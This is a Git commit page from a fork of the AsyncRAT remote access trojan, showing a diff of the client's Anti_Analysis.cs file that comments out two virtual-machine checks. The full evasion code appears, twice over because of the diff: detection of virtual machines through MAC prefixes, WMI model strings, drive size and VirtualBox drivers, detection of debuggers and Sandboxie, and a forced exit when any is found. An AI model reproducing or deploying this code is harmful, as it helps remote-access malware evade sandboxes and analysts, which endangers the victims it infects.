Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Commented out Unimplemented methods

Browse Source 
Will probably add these methods at a later date once they have been updated to work with this version
This commit is contained in:
MrDevBot 2019-05-21 19:35:37 +10:00 committed by GitHub
parent 0e5870a795
commit 34c8a05752
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 118 additions and 118 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

236
AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
View File

@ -1,7 +1,7 @@
using System;
using System.Diagnostics;
using System;
using System.Diagnostics;
using System.Linq;
using System.Management;
using System.Management;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
@ -12,125 +12,125 @@ using System.Runtime.InteropServices;
// This program is distributed for educational purposes only.
namespace Client.Helper
{
class Anti_Analysis
namespace Client.Helper
{
class Anti_Analysis
{
private static long GB_50 = 50000000000;
public static void RunAntiAnalysis()
{
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
Environment.FailFast(null);
private static long GB_50 = 50000000000;
public static void RunAntiAnalysis()
{
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
Environment.FailFast(null);
}
internal static bool SmallHDD()
{
// Method One - main drive smaller than 50gb, likely a VM
long driveSize = Methods.GetMainDriveSize();
if (driveSize <= GB_50 * 2)
return true;
// Method Two - has common card of virtual machine
if (HasVMCard())
return true;
// Method Three - checks for vm drivers
if (HasVBOXDriver())
return true;
// Method Four - if machine has been on for less than 5 mins
if (GetUptime() < TimeSpan.FromMinutes(5))
internal static bool SmallHDD()
{
// Method One - main drive smaller than 50gb, likely a VM
long driveSize = Methods.GetMainDriveSize();
if (driveSize <= GB_50 * 2)
return true;
// Method Two - has common card of virtual machine
//if (HasVMCard())
//return true;
// Method Three - checks for vm drivers
if (HasVBOXDriver())
return true;
// Method Four - if machine has been on for less than 5 mins
//if (GetUptime() < TimeSpan.FromMinutes(5))
//return true;
// Method Five - has VM mac address
if (HasVMMac())
return true;
return false;
if (HasVMMac())
return true;
return false;
}
private static bool HasVMMac()
{
var macAddr =
(
from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up
select nic.GetPhysicalAddress().ToString()
).FirstOrDefault();
var macs = new[]
{
"00-05-69",
"00:05:69",
"000569",
"00-50-56",
"00:50:56",
"005056",
"00-0C-29",
"00:0C:29",
"000C29",
"00-1C-14",
"00:1C:14",
"001C14",
"08-00-27",
"08:00:27",
"080027",
};
foreach (string mac in macs)
{
if (mac == macAddr)
return true;
}
return false;
}
private static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox")
{
return true;
}
}
}
}
return false;
}
private static bool DetectDebugger()
{
bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
private static bool DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}
private static bool HasVMMac()
{
var macAddr =
(
from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up
select nic.GetPhysicalAddress().ToString()
).FirstOrDefault();
var macs = new[]
{
"00-05-69",
"00:05:69",
"000569",
"00-50-56",
"00:50:56",
"005056",
"00-0C-29",
"00:0C:29",
"000C29",
"00-1C-14",
"00:1C:14",
"001C14",
"08-00-27",
"08:00:27",
"080027",
};
foreach (string mac in macs)
{
if (mac == macAddr)
return true;
}
return false;
}
private static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox")
{
return true;
}
}
}
}
return false;
}
private static bool DetectDebugger()
{
bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
private static bool DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}